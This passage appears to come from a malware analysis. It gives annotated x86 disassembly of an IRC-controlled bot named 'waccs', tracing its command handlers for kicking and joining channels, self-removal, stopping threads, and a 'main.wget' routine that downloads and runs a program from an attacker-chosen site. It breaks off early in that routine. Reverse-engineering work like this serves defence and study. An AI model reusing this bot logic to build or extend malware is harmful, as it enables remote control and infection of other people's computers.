00401778  E8 59100000       CALL waccs.004027D6                       ; ASCII "KICK"
0040177D  50                PUSH EAX
0040177E  E8 1F590000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "KICK").
00401783  59                POP ECX
00401784  59                POP ECX
00401785  85C0              TEST EAX,EAX
00401787  75 64             JNZ SHORT waccs.004017ED
00401789  FFB5 6CFEFFFF     PUSH DWORD PTR SS:[EBP-194]
0040178F  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401792  05 A1000000       ADD EAX,0A1
00401797  50                PUSH EAX
00401798  E8 05590000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (further command identification: check whether it is "##ghetto##").
0040179D  59                POP ECX
0040179E  59                POP ECX
0040179F  F7D8              NEG EAX
004017A1  1BC0              SBB EAX,EAX
004017A3  40                INC EAX
004017A4  8885 D4F4FFFF     MOV BYTE PTR SS:[EBP-B2C],AL
004017AA  0FB685 D4F4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B2C]
004017B1  85C0              TEST EAX,EAX
004017B3  74 38             JE SHORT waccs.004017ED
004017B5  FFB5 70FEFFFF     PUSH DWORD PTR SS:[EBP-190]
004017BB  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
004017BE  05 EC000000       ADD EAX,0EC
004017C3  50                PUSH EAX
004017C4  E8 D9580000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (further command identification).
004017C9  59                POP ECX
004017CA  59                POP ECX
004017CB  F7D8              NEG EAX
004017CD  1BC0              SBB EAX,EAX
004017CF  40                INC EAX
004017D0  8885 D0F4FFFF     MOV BYTE PTR SS:[EBP-B30],AL
004017D6  0FB685 D0F4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B30]
004017DD  85C0              TEST EAX,EAX
004017DF  74 0C             JE SHORT waccs.004017ED
004017E1  C785 50F4FFFF 0>  MOV DWORD PTR SS:[EBP-BB0],1
004017EB  EB 07             JMP SHORT waccs.004017F4
004017ED  83A5 50F4FFFF 0>  AND DWORD PTR SS:[EBP-BB0],0
004017F4  8A85 50F4FFFF     MOV AL,BYTE PTR SS:[EBP-BB0]
004017FA  8885 E0F4FFFF     MOV BYTE PTR SS:[EBP-B20],AL
00401800  8D8D D8F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B28]
00401806  E8 1B080000       CALL waccs.00402026                       ; Clear memory data.
0040180B  0FB685 E0F4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B20]
00401812  85C0              TEST EAX,EAX
00401814  74 39             JE SHORT waccs.0040184F                   ; Decide whether the "KICK" command should be handled.
00401816  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401819  05 BA000000       ADD EAX,0BA
0040181E  50                PUSH EAX
0040181F  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401822  05 A1000000       ADD EAX,0A1
00401827  50                PUSH EAX
00401828  68 8CA52F28       PUSH 282FA58C
0040182D  8D8D C4F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B3C]
00401833  E8 FE0F0000       CALL waccs.00402836                       ; ASCII "JOIN %s %s"
00401838  50                PUSH EAX
00401839  FF75 08           PUSH DWORD PTR SS:[EBP+8]
0040183C  E8 BFF7FFFF       CALL waccs.00401000                       ; Build and send a packet.
00401841  83C4 10           ADD ESP,10
00401844  8D8D C4F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B3C]
0040184A  E8 27080000       CALL waccs.00402076                       ; Clear memory data.
0040184F  FFB5 68FEFFFF     PUSH DWORD PTR SS:[EBP-198]
00401855  68 4C914000       PUSH waccs.0040914C                       ; ASCII "332"
0040185A  E8 43580000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "332").
0040185F  59                POP ECX
00401860  59                POP ECX
00401861  85C0              TEST EAX,EAX
00401863  75 0C             JNZ SHORT waccs.00401871                  ; Decide whether the "332" command should be handled.
00401865  C745 FC 0500000>  MOV DWORD PTR SS:[EBP-4],5
0040186C  E9 9C000000       JMP waccs.0040190D
00401871  FFB5 68FEFFFF     PUSH DWORD PTR SS:[EBP-198]
00401877  68 3F38E862       PUSH 62E8383F
0040187C  8D8D B8F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B48]
00401882  E8 0F100000       CALL waccs.00402896                       ; ASCII "PRIVMSG"
00401887  50                PUSH EAX
00401888  E8 15580000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "PRIVMSG").
0040188D  59                POP ECX
0040188E  59                POP ECX
0040188F  85C0              TEST EAX,EAX
00401891  74 4C             JE SHORT waccs.004018DF                   ; Decide whether the "PRIVMSG" command should be handled.
00401893  FFB5 68FEFFFF     PUSH DWORD PTR SS:[EBP-198]
00401899  68 3FCE37DE       PUSH DE37CE3F
0040189E  8D8D B0F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B50]
004018A4  E8 4D100000       CALL waccs.004028F6                       ; ASCII "332"
004018A9  50                PUSH EAX
004018AA  E8 F3570000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "332").
004018AF  59                POP ECX
004018B0  59                POP ECX
004018B1  F7D8              NEG EAX
004018B3  1BC0              SBB EAX,EAX
004018B5  F7D8              NEG EAX
004018B7  8885 B4F4FFFF     MOV BYTE PTR SS:[EBP-B4C],AL
004018BD  8D8D B0F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B50]
004018C3  E8 86070000       CALL waccs.0040204E                       ; Clear memory data.
004018C8  0FB685 B4F4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B4C]
004018CF  85C0              TEST EAX,EAX
004018D1  74 0C             JE SHORT waccs.004018DF                   ; Decide whether the "332" command should be handled.
004018D3  C785 4CF4FFFF 0>  MOV DWORD PTR SS:[EBP-BB4],1
004018DD  EB 07             JMP SHORT waccs.004018E6
004018DF  83A5 4CF4FFFF 0>  AND DWORD PTR SS:[EBP-BB4],0
004018E6  8A85 4CF4FFFF     MOV AL,BYTE PTR SS:[EBP-BB4]
004018EC  8885 C0F4FFFF     MOV BYTE PTR SS:[EBP-B40],AL
004018F2  8D8D B8F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B48]
004018F8  E8 D9060000       CALL waccs.00401FD6                       ; Clear memory data.
004018FD  0FB685 C0F4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B40]
00401904  85C0              TEST EAX,EAX
00401906  74 05             JE SHORT waccs.0040190D
00401908  E9 86050000       JMP waccs.00401E93                        ; Return from (exit) this function.
0040190D  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
00401910  8B8485 60FEFFFF   MOV EAX,DWORD PTR SS:[EBP+EAX*4-1A0]
00401917  8B4D FC           MOV ECX,DWORD PTR SS:[EBP-4]
0040191A  8B8C8D 60FEFFFF   MOV ECX,DWORD PTR SS:[EBP+ECX*4-1A0]
00401921  41                INC ECX
00401922  8B55 FC           MOV EDX,DWORD PTR SS:[EBP-4]
00401925  898C95 60FEFFFF   MOV DWORD PTR SS:[EBP+EDX*4-1A0],ECX
0040192C  85C0              TEST EAX,EAX
0040192E  74 0D             JE SHORT waccs.0040193D
00401930  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
00401933  83BC85 64FEFFFF>  CMP DWORD PTR SS:[EBP+EAX*4-19C],0
0040193B  75 05             JNZ SHORT waccs.00401942
0040193D  E9 51050000       JMP waccs.00401E93                        ; Return from (exit) this function.
00401942  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401945  05 EC000000       ADD EAX,0EC
0040194A  50                PUSH EAX
0040194B  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
0040194E  FFB485 60FEFFFF   PUSH DWORD PTR SS:[EBP+EAX*4-1A0]
00401955  E8 61250000       CALL waccs.00403EBB                       ; Data processing.
0040195A  59                POP ECX
0040195B  59                POP ECX
0040195C  85C0              TEST EAX,EAX
0040195E  74 05             JE SHORT waccs.00401965
00401960  E9 2E050000       JMP waccs.00401E93                        ; Return from (exit) this function.
00401965  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
00401968  FFB485 64FEFFFF   PUSH DWORD PTR SS:[EBP+EAX*4-19C]
0040196F  68 DD341F7F       PUSH 7F1F34DD
00401974  8D8D A0F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B60]
0040197A  E8 D70F0000       CALL waccs.00402956                       ; ASCII "main.remove"
0040197F  50                PUSH EAX
00401980  E8 1D570000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "main.remove").
00401985  59                POP ECX
00401986  59                POP ECX
00401987  F7D8              NEG EAX
00401989  1BC0              SBB EAX,EAX
0040198B  40                INC EAX
0040198C  8885 ACF4FFFF     MOV BYTE PTR SS:[EBP-B54],AL
00401992  8D8D A0F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B60]
00401998  E8 01070000       CALL waccs.0040209E                       ; Clear memory data.
0040199D  0FB685 ACF4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B54]
004019A4  85C0              TEST EAX,EAX
004019A6  74 4A             JE SHORT waccs.004019F2                   ; Decide whether the "main.remove" command should be handled.
004019A8  68 34BB33D5       PUSH D533BB34
004019AD  8D8D 90F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B70]
004019B3  E8 FE0F0000       CALL waccs.004029B6                       ; ASCII "QUIT :Removing"
004019B8  50                PUSH EAX
004019B9  FF75 08           PUSH DWORD PTR SS:[EBP+8]
004019BC  E8 3FF6FFFF       CALL waccs.00401000                       ; Build and send a packet.
004019C1  59                POP ECX
004019C2  59                POP ECX
004019C3  8D8D 90F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B70]
004019C9  E8 90050000       CALL waccs.00401F5E                       ; Clear memory data.
004019CE  FF15 E8814000     CALL DWORD PTR DS:[4081E8]                ; WS2_32.WSACleanup (release the WinSock library).
004019D4  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
004019D7  FFB0 0C010000     PUSH DWORD PTR DS:[EAX+10C]
004019DD  FF15 74804000     CALL DWORD PTR DS:[408074]                ; kernel32.ReleaseMutex (release a mutex owned by the thread).
004019E3  6A 00             PUSH 0
004019E5  E8 86270000       CALL waccs.00404170                       ; Delete the virus's autostart entry from the registry.
004019EA  59                POP ECX
004019EB  E8 1D260000       CALL waccs.0040400D                       ; The main virus program file deletes itself.
004019F0  EB 60             JMP SHORT waccs.00401A52
004019F2  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
004019F5  FFB485 64FEFFFF   PUSH DWORD PTR SS:[EBP+EAX*4-19C]
004019FC  68 843DBF83       PUSH 83BF3D84
00401A01  8D8D 80F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B80]
00401A07  E8 0A100000       CALL waccs.00402A16                       ; ASCII "msn.stop"
00401A0C  50                PUSH EAX
00401A0D  E8 90560000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "msn.stop").
00401A12  59                POP ECX
00401A13  59                POP ECX
00401A14  F7D8              NEG EAX
00401A16  1BC0              SBB EAX,EAX
00401A18  40                INC EAX
00401A19  8885 8CF4FFFF     MOV BYTE PTR SS:[EBP-B74],AL
00401A1F  8D8D 80F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B80]
00401A25  E8 9C060000       CALL waccs.004020C6                       ; Clear memory data.
00401A2A  0FB685 8CF4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B74]
00401A31  85C0              TEST EAX,EAX
00401A33  74 1D             JE SHORT waccs.00401A52                   ; Decide whether the "msn.stop" command should be handled.
00401A35  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401A38  83B8 10010000 0>  CMP DWORD PTR DS:[EAX+110],0
00401A3F  74 11             JE SHORT waccs.00401A52                   ; Check whether the thread handle at +110 is set.
00401A41  6A 00             PUSH 0
00401A43  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401A46  FFB0 10010000     PUSH DWORD PTR DS:[EAX+110]
00401A4C  FF15 70804000     CALL DWORD PTR DS:[408070]                ; kernel32.TerminateThread (terminate the thread).
00401A52  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
00401A55  83BC85 68FEFFFF>  CMP DWORD PTR SS:[EBP+EAX*4-198],0
00401A5D  75 05             JNZ SHORT waccs.00401A64
00401A5F  E9 2F040000       JMP waccs.00401E93                        ; Return from (exit) this function.
00401A64  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
00401A67  FFB485 64FEFFFF   PUSH DWORD PTR SS:[EBP+EAX*4-19C]
00401A6E  68 C2143DAE       PUSH AE3D14C2
00401A73  8D8D 70F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B90]
00401A79  E8 F80F0000       CALL waccs.00402A76                       ; ASCII "main.wget"
00401A7E  50                PUSH EAX
00401A7F  E8 1E560000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "main.wget").
00401A84  59                POP ECX
00401A85  59                POP ECX
00401A86  F7D8              NEG EAX
00401A88  1BC0              SBB EAX,EAX
00401A8A  40                INC EAX
00401A8B  8885 7CF4FFFF     MOV BYTE PTR SS:[EBP-B84],AL
00401A91  8D8D 70F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B90]
00401A97  E8 52060000       CALL waccs.004020EE                       ; Clear memory data.
00401A9C  0FB685 7CF4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B84]
00401AA3  85C0              TEST EAX,EAX
00401AA5  74 78             JE SHORT waccs.00401B1F                   ; Decide whether the "main.wget" command should be handled.
00401AA7  80A5 58FDFFFF 0>  AND BYTE PTR SS:[EBP-2A8],0
00401AAE  68 04010000       PUSH 104
00401AB3  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
00401AB6  FFB485 68FEFFFF   PUSH DWORD PTR SS:[EBP+EAX*4-198]
00401ABD  8D85 59FDFFFF     LEA EAX,DWORD PTR SS:[EBP-2A7]
00401AC3  50                PUSH EAX
00401AC4  E8 D3550000       CALL waccs.0040709C                       ; JMP to msvcrt.strncpy
00401AC9  83C4 0C           ADD ESP,0C
00401ACC  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401ACF  8985 60FEFFFF     MOV DWORD PTR SS:[EBP-1A0],EAX
00401AD5  8D85 58FDFFFF     LEA EAX,DWORD PTR SS:[EBP-2A8]
00401ADB  50                PUSH EAX
00401ADC  6A 00             PUSH 0
00401ADE  68 143A4000       PUSH waccs.00403A14
00401AE3  E8 AE550000       CALL waccs.00407096                       ; JMP to msvcrt._beginthread (create a child thread whose function is at 00403A14; the thread downloads another program from the remote site specified by the attacker and runs it automatically).
00401AE8 83C4 0C ADD ESP,0C
00401AEB 83A5 54FDFFFF 0>AND DWORD PTR SS:[EBP-2AC],0
00401AF2 EB 0D JMP SHORT waccs.00401B01
00401AF4 8B85 54FDFFFF MOV EAX,DWORD PTR SS:[EBP-2AC]
00401AFA 40 INC EAX
00401AFB 8985 54FDFFFF MOV DWORD PTR SS:[EBP-2AC],EAX
00401B01 0FB685 58FDFFFF MOVZX EAX,BYTE PTR SS:[EBP-2A8]
00401B08 85C0 TEST EAX,EAX
00401B0A 75 13 JNZ SHORT waccs.00401B1F
00401B0C 83BD 54FDFFFF 5>CMP DWORD PTR SS:[EBP-2AC],50
00401B13 7D 0A JGE SHORT waccs.00401B1F
00401B15 6A 19 PUSH 19
00401B17 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep (wait).
00401B1D ^ EB D5 JMP SHORT waccs.00401AF4
00401B1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401B22 83BC85 70FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-190],0
00401B2A 75 05 JNZ SHORT waccs.00401B31
00401B2C E9 62030000 JMP waccs.00401E93 ; Return from (exit) the function.
00401B31 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401B34 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C]
00401B3B 68 4378F788 PUSH 88F77843
00401B40 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0]
00401B46 E8 8B0F0000 CALL waccs.00402AD6 ; ASCII "msn.self"
00401B4B 50 PUSH EAX
00401B4C E8 51550000 CALL waccs.004070A2 ; JMP to msvcrt.strcmp (check whether the command is "msn.self").
00401B51 59 POP ECX
00401B52 59 POP ECX
00401B53 F7D8 NEG EAX
00401B55 1BC0 SBB EAX,EAX
00401B57 40 INC EAX
00401B58 8885 6CF4FFFF MOV BYTE PTR SS:[EBP-B94],AL
00401B5E 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0]
00401B64 E8 5D050000 CALL waccs.004020C6 ; Wipe the memory buffer.
00401B69 0FB685 6CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B94]
00401B70 85C0 TEST EAX,EAX
00401B72 0F84 52010000 JE waccs.00401CCA ; Decide whether the "msn.self" command should run.
00401B78 68 20040000 PUSH 420
00401B7D 6A 00 PUSH 0
00401B7F 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC]
00401B85 50 PUSH EAX
00401B86 E8 AF540000 CALL waccs.0040703A ; JMP to msvcrt.memset
00401B8B 83C4 0C ADD ESP,0C
00401B8E 80A5 34F9FFFF 0>AND BYTE PTR SS:[EBP-6CC],0
00401B95 68 04010000 PUSH 104
00401B9A 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401B9D FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198]
00401BA4 8D85 41FCFFFF LEA EAX,DWORD PTR SS:[EBP-3BF]
00401BAA 50 PUSH EAX
00401BAB E8 EC540000 CALL waccs.0040709C ; JMP to msvcrt.strncpy
00401BB0 83C4 0C ADD ESP,0C
00401BB3 68 04010000 PUSH 104
00401BB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401BBB FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-194]
00401BC2 8D85 39FAFFFF LEA EAX,DWORD PTR SS:[EBP-5C7]
00401BC8 50 PUSH EAX
00401BC9 E8 CE540000 CALL waccs.0040709C ; JMP to msvcrt.strncpy
00401BCE 83C4 0C ADD ESP,0C
00401BD1 68 04010000 PUSH 104
00401BD6 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401BD9 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-190]
00401BE0 8D85 3DFBFFFF LEA EAX,DWORD PTR SS:[EBP-4C3]
00401BE6 50 PUSH EAX
00401BE7 E8 B0540000 CALL waccs.0040709C ; JMP to msvcrt.strncpy
00401BEC 83C4 0C ADD ESP,0C
00401BEF 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401BF2 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-18C],0
00401BFA 74 41 JE SHORT waccs.00401C3D
00401BFC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401BFF 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-188],0
00401C07 74 34 JE SHORT waccs.00401C3D
00401C09 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401C0C FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-18C]
00401C13 E8 78540000 CALL waccs.00407090 ; JMP to msvcrt.atoi
00401C18 59 POP ECX
00401C19 8985 48FDFFFF MOV DWORD PTR SS:[EBP-2B8],EAX
00401C1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401C22 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-188]
00401C29 E8 62540000 CALL waccs.00407090 ; JMP to msvcrt.atoi
00401C2E 59 POP ECX
00401C2F 69C0 60EA0000 IMUL EAX,EAX,0EA60
00401C35 8985 4CFDFFFF MOV DWORD PTR SS:[EBP-2B4],EAX
00401C3B EB 14 JMP SHORT waccs.00401C51
00401C3D C785 48FDFFFF 0>MOV DWORD PTR SS:[EBP-2B8],1
00401C47 C785 4CFDFFFF F>MOV DWORD PTR SS:[EBP-2B4],0FA
00401C51 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00401C54 8985 50FDFFFF MOV DWORD PTR SS:[EBP-2B0],EAX
00401C5A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00401C5D 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0
00401C64 74 11 JE SHORT waccs.00401C77
00401C66 6A 00 PUSH 0
00401C68 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00401C6B FFB0 10010000 PUSH DWORD PTR DS:[EAX+110]
00401C71 FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread (kill the thread).
00401C77 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC]
00401C7D 50 PUSH EAX
00401C7E 6A 00 PUSH 0
00401C80 68 FE4C4000 PUSH waccs.00404CFE
00401C85 E8 0C540000 CALL waccs.00407096 ; JMP to msvcrt._beginthread (create a child thread whose start routine is 00404CFE; the thread opens a connection, fetches information from a remote web site, and downloads and deletes the specified files).
00401C8A 83C4 0C ADD ESP,0C
00401C8D 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00401C90 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX
00401C96 83A5 30F9FFFF 0>AND DWORD PTR SS:[EBP-6D0],0
00401C9D EB 0D JMP SHORT waccs.00401CAC
00401C9F 8B85 30F9FFFF MOV EAX,DWORD PTR SS:[EBP-6D0]
00401CA5 40 INC EAX
00401CA6 8985 30F9FFFF MOV DWORD PTR SS:[EBP-6D0],EAX
00401CAC 0FB685 34F9FFFF MOVZX EAX,BYTE PTR SS:[EBP-6CC]
00401CB3 85C0 TEST EAX,EAX
00401CB5 75 13 JNZ SHORT waccs.00401CCA
00401CB7 83BD 30F9FFFF 5>CMP DWORD PTR SS:[EBP-6D0],50
00401CBE 7D 0A JGE SHORT waccs.00401CCA
00401CC0 6A 19 PUSH 19
00401CC2 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep (wait).
00401CC8 ^ EB D5 JMP SHORT waccs.00401C9F
00401CCA 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401CCD 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-18C],0
00401CD5 75 05 JNZ SHORT waccs.00401CDC
00401CD7 E9 B7010000 JMP waccs.00401E93 ; Return from (exit) the function.
00401CDC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401CDF FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C]
00401CE6 68 D7A57E24 PUSH 247EA5D7
00401CEB 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC]
00401CF1 E8 400E0000 CALL waccs.00402B36 ; ASCII "msn.url"
00401CF6 50 PUSH EAX
00401CF7 E8 A6530000 CALL waccs.004070A2 ; JMP to msvcrt.strcmp (check whether the command is "msn.url").
00401CFC 59 POP ECX
00401CFD 59 POP ECX
00401CFE F7D8 NEG EAX
00401D00 1BC0 SBB EAX,EAX
00401D02 40 INC EAX
00401D03 8885 5CF4FFFF MOV BYTE PTR SS:[EBP-BA4],AL
00401D09 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC]
00401D0F E8 C2020000 CALL waccs.00401FD6 ; Wipe the memory buffer.
00401D14 0FB685 5CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-BA4]
00401D1B 85C0 TEST EAX,EAX
00401D1D 0F84 70010000 JE waccs.00401E93 ; Decide whether the "msn.url" command should run.
00401D23 68 20040000 PUSH 420
00401D28 6A 00 PUSH 0
00401D2A 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0]
00401D30 50 PUSH EAX
00401D31 E8 04530000 CALL waccs.0040703A ; JMP to msvcrt.memset
00401D36 83C4 0C ADD ESP,0C
00401D39 80A5 10F5FFFF 0>AND BYTE PTR SS:[EBP-AF0],0
00401D40 68 04010000 PUSH 104
00401D45 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401D48 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198]
00401D4F 8D85 1DF8FFFF LEA EAX,DWORD PTR SS:[EBP-7E3]
00401D55 50 PUSH EAX
00401D56 E8 41530000 CALL waccs.0040709C ; JMP to msvcrt.strncpy
00401D5B 83C4 0C ADD ESP,0C
00401D5E 68 04010000 PUSH 104
00401D63 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401D66 FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-194]
00401D6D 8D85 11F5FFFF LEA EAX,DWORD PTR SS:[EBP-AEF]
00401D73 50 PUSH EAX
00401D74 E8 23530000 CALL waccs.0040709C ; JMP to msvcrt.strncpy
00401D79 83C4 0C ADD ESP,0C
00401D7C 68 04010000 PUSH 104
00401D81 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401D84 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-190]
00401D8B 8D85 15F6FFFF LEA EAX,DWORD PTR SS:[EBP-9EB]
00401D91 50 PUSH EAX
00401D92 E8 05530000 CALL waccs.0040709C ; JMP to msvcrt.strncpy
00401D97 83C4 0C ADD ESP,0C
00401D9A 68 04010000 PUSH 104
00401D9F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401DA2 FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-18C]
00401DA9 8D85 19F7FFFF LEA EAX,DWORD PTR SS:[EBP-8E7]
00401DAF 50 PUSH EAX
00401DB0 E8 E7520000 CALL waccs.0040709C ; JMP to msvcrt.strncpy
00401DB5 83C4 0C ADD ESP,0C
00401DB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401DBB 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-188],0
00401DC3 74 41 JE SHORT waccs.00401E06
00401DC5 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401DC8 83BC85 7CFEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-184],0
00401DD0 74 34 JE SHORT waccs.00401E06
00401DD2 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401DD5 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-188]
00401DDC E8 AF520000 CALL waccs.00407090 ; JMP to msvcrt.atoi
00401DE1 59 POP ECX
00401DE2 8985 24F9FFFF MOV DWORD PTR SS:[EBP-6DC],EAX
00401DE8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00401DEB FFB485 7CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-184]
00401DF2 E8 99520000 CALL waccs.00407090 ; JMP to msvcrt.atoi
00401DF7 59 POP ECX
00401DF8 69C0 60EA0000 IMUL EAX,EAX,0EA60
00401DFE 8985 28F9FFFF MOV DWORD PTR SS:[EBP-6D8],EAX
00401E04 EB 14 JMP SHORT waccs.00401E1A
00401E06 C785 24F9FFFF 0>MOV DWORD PTR SS:[EBP-6DC],1
00401E10 C785 28F9FFFF F>MOV DWORD PTR SS:[EBP-6D8],0FA
00401E1A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00401E1D 8985 2CF9FFFF MOV DWORD PTR SS:[EBP-6D4],EAX
00401E23 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00401E26 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0
00401E2D 74 11 JE SHORT waccs.00401E40
00401E2F 6A 00 PUSH 0
00401E31 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00401E34 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110]
00401E3A FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread (kill the thread).
00401E40 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0]
00401E46 50 PUSH EAX
00401E47 6A 00 PUSH 0
00401E49 68 FE4C4000 PUSH waccs.00404CFE
00401E4E E8 43520000 CALL waccs.00407096 ; JMP to msvcrt._beginthread (create a child thread whose start routine is 00404CFE; the thread opens a connection, fetches information from a remote web site, and downloads and deletes the specified files).
00401E53 83C4 0C ADD ESP,0C
00401E56 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00401E59 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX
00401E5F 83A5 0CF5FFFF 0>AND DWORD PTR SS:[EBP-AF4],0
00401E66 EB 0D JMP SHORT waccs.00401E75
00401E68 8B85 0CF5FFFF MOV EAX,DWORD PTR SS:[EBP-AF4]
00401E6E 40 INC EAX
00401E6F 8985 0CF5FFFF MOV DWORD PTR SS:[EBP-AF4],EAX
00401E75 0FB685 10F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF0]
00401E7C 85C0 TEST EAX,EAX
00401E7E 75 13 JNZ SHORT waccs.00401E93
00401E80 83BD 0CF5FFFF 5>CMP DWORD PTR SS:[EBP-AF4],50
00401E87 7D 0A JGE SHORT waccs.00401E93
00401E89 6A 19 PUSH 19
00401E8B FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep (wait).
00401E91 ^ EB D5 JMP SHORT waccs.00401E68
00401E93 5F POP EDI
00401E94 C9 LEAVE
00401E95 C3 RETN ; Return.

Downloading another program from a remote server chosen by the attacker and running it automatically:

00403A14 55 PUSH EBP
00403A15 8BEC MOV EBP,ESP
00403A17 81EC 6C030000 SUB ESP,36C
00403A1D 56 PUSH ESI
00403A1E 57 PUSH EDI
00403A1F 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
00403A22 6A 43 PUSH 43
00403A24 59 POP ECX
